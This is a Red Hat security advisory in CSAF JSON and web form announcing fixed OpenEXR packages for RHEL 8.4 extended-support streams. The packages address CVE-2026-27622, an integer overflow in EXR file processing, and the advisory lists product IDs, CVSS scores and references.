"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T14:33:24+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:12341
Vulnerability from csaf_redhat - Published: 2026-04-30 14:34 - Updated: 2026-06-30 04:26Summary
Red Hat Security Advisory: OpenEXR security update
Severity
Important
Notes
Topic: An update for OpenEXR is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support and Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light & Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format.
Security Fix(es):
* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
7.4 (High)
Affected products
Fixed
18 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
9 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support and Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12341",
"url": "https://access.redhat.com/errata/RHSA-2026:12341"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12341.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-06-30T04:26:57+00:00",
"generator": {
"date": "2026-06-30T04:26:57+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.0"
}
},
"id": "RHSA-2026:12341",
"initial_release_date": "2026-04-30T14:34:33+00:00",
"revision_history": [
{
"date": "2026-04-30T14:34:33+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T14:34:33+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-30T04:26:57+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product": {
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_aus:8.4::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_4.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_4.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_4.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_4.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_4.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_4.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_4.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_4.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_4.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T14:34:33+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
